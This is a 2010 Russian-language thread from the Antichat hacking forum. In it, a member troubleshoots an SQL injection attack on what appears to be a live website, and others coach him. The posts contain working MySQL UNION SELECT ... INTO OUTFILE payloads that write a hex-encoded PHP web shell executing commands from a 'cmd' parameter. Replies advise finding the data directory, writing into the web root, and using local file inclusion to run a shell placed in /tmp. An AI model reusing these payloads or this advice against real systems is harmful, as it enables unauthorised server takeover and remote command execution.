17.05.2010, 23:50
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
Microsoft JET Database Engine error '80040e14'
значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
|
|
|
18.05.2010, 13:13
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от pinch
Microsoft JET Database Engine error '80040e14'
значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
Можно поподробнее про передачу запросов на низком уровне? Спасибо.
|
|
|
|
18.05.2010, 14:00
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
С нами:
8556372
Репутация:
127
|
|
Сообщение от .Slip
Можно поподробнее про передачу запросов на низком уровне? Спасибо.
Ну это, наверное, только при особых условиях
|
|
|
|
19.05.2010, 23:54
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от .Slip
Сообщение от pinch
Microsoft JET Database Engine error '80040e14'
значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
Можно поподробнее про передачу запросов на низком уровне? Спасибо.
Поднимаю свой вопрос. Не могу спокойно спать, всё время думаю о низкоуровневых запросах.
|
|
|
|
18.05.2010, 02:38
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
здрасте
Не Могу понять в чем проблема..
делаю такой запрос :
6+union+select+1+into+outfile+'1.php'+--+
на что получил ответ :
display_db_query: SELECT content from page where id = -6 union select 1 into outfile '1.php' -- File '1.php' already exists
ТОЕСТЬ я могу создавать файлы ?
потом делаю что то такое:
6+union+select+load_file(0x3C3F7061737374687275282 45F4745545B27636D64275D293B3F3E)+into+outfile+'1.p hp'+--+
на что получил ответ :
display_db_query: SELECT content from page where id = 6 union select load_file(0x3C3F706173737468727528245F4745545B2763 6D64275D293B3F3E) into outfile '1.php' -- File '1.php' already exists
и как мне теперь проверить что у меня получилось ?
где мне найти этот '1.php'
если кому не лень можна и попадробней в PM
спс за время. 
Последний раз редактировалось Saiga; 18.05.2010 в 02:42..
|
|
|
|
18.05.2010, 03:00
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
в дефолтной папке mysql (уже не помню какая) уже есть файл 1.php. Зачем тебе его искать? Можно в /tmp создать
PS в пм мне не надо писать, я не умею ломать сайты и никогда этим не занимался
|
|
|
|
18.05.2010, 10:31
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
ТОЕСТЬ я могу создавать файлы ?
да
где мне найти этот '1.php'
@@datadir
и как мне теперь проверить что у меня получилось ?
прочитать этот файл через load_file
P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
+union+select+load_file(0x3C3F7061737374687275282 45F4745545B27636D64275D293B3F3E)+into+outfile+'1.p hp'+--+
|
|
|
|
19.05.2010, 22:11
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Сообщение от Iceangel_
да
@@datadir
прочитать этот файл через load_file
P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
Спасибо..
Посидел почитал ... понял что за бред написал ( Буду курить менче )
Воспользовался советами :
Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись
Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам
6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+
На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига
Решил попробовать пойти другим путем:
union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+
здесь тодзе вопрос, ww.site.com/????? (нужна cmd)
Народ я хоть в правильном направление двигаюсь ?
Последний раз редактировалось Saiga; 19.05.2010 в 22:14..
|
|
|
|
19.05.2010, 22:22
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Saiga
Спасибо..
Посидел почитал ... понял что за бред написал ( Буду курить менче )
Воспользовался советами :
Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись
Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам
6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+
На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига
Решил попробовать пойти другим путем:
union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+
здесь тодзе вопрос, ww.site.com/????? (нужна cmd)
Народ я хоть в правильном направление двигаюсь ?
в веб-директорию сайта заливать нужно.
|
|
|
|
19.05.2010, 22:23
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от Saiga
Спасибо..
Посидел почитал ... понял что за бред написал ( Буду курить менче )
Воспользовался советами :
Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись
Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам
6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+
На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига
Решил попробовать пойти другим путем:
union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+
здесь тодзе вопрос, ww.site.com/????? (нужна cmd)
Народ я хоть в правильном направление двигаюсь ? /tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Комбинированный вид
